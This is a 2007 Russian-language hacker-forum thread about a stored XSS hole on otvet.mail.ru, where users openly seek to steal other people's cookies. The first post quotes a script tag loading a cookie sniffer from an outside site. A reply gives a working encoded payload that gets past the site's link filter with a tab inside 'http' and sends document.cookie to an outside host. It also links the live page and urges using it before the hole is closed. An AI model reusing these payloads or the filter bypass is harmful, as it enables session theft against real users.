Активная XSS на otvet.mail.ru!!!

Discussion in 'Уязвимости' started by DesignerMix, 11 Jan 2007.

  1. DesignerMix

    DesignerMix Elder - Старейшина

    Joined:
    10 Jan 2007
    Messages:
    35
    Likes Received:
    11
    Reputations:
    5
    Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш
    Code:
    %3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ
    Code:
    <scriptsrc="http://www.naxodka.net/cookie.js"></script>
    . Всё равно фильтрует гад, вот результат фильтрации
    Code:
    <script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>
    . По моему эта тема интерестна всем, так давайте её раскрутим, а?!!! :)
     
    #1 DesignerMix, 11 Jan 2007
    Last edited: 11 Jan 2007
    2 people like this.
  2. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Ура!=)
    тоже сначала кодировал в разные кодировки результата 0.

    достачно было поставить табуляцию между ht и tp

    вот весь код:
    Code:
    %3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E
    страница с xss:
    http://otvet.mail.ru/question/2334480/

    юзаем пока не прикрыли=\
     
    2 people like this.
  3. Z@P@DL0

    Z@P@DL0 New Member

    Joined:
    11 Jan 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Спасибо! Давно искал рабочию!
     
  4. DesignerMix

    DesignerMix Elder - Старейшина

    Joined:
    10 Jan 2007
    Messages:
    35
    Likes Received:
    11
    Reputations:
    5
    Всё лафа кончилась...прикрыли уязвимость, но кого это пугает??? Будем новые искать =).
     
    1 person likes this.
  5. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    быстро ж они прикрывают..
    пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)
     
    1 person likes this.
  6. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    ага, Андрюша, привет )
     
    1 person likes this.
  7. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    Rebz да тут им делать нечего, просто написали в открытую про активную ксску, ну и куча придурков сразу полезла ее непрекрыто вставлять везде где тока можно. Там уж админы не полные дураки. только на половину...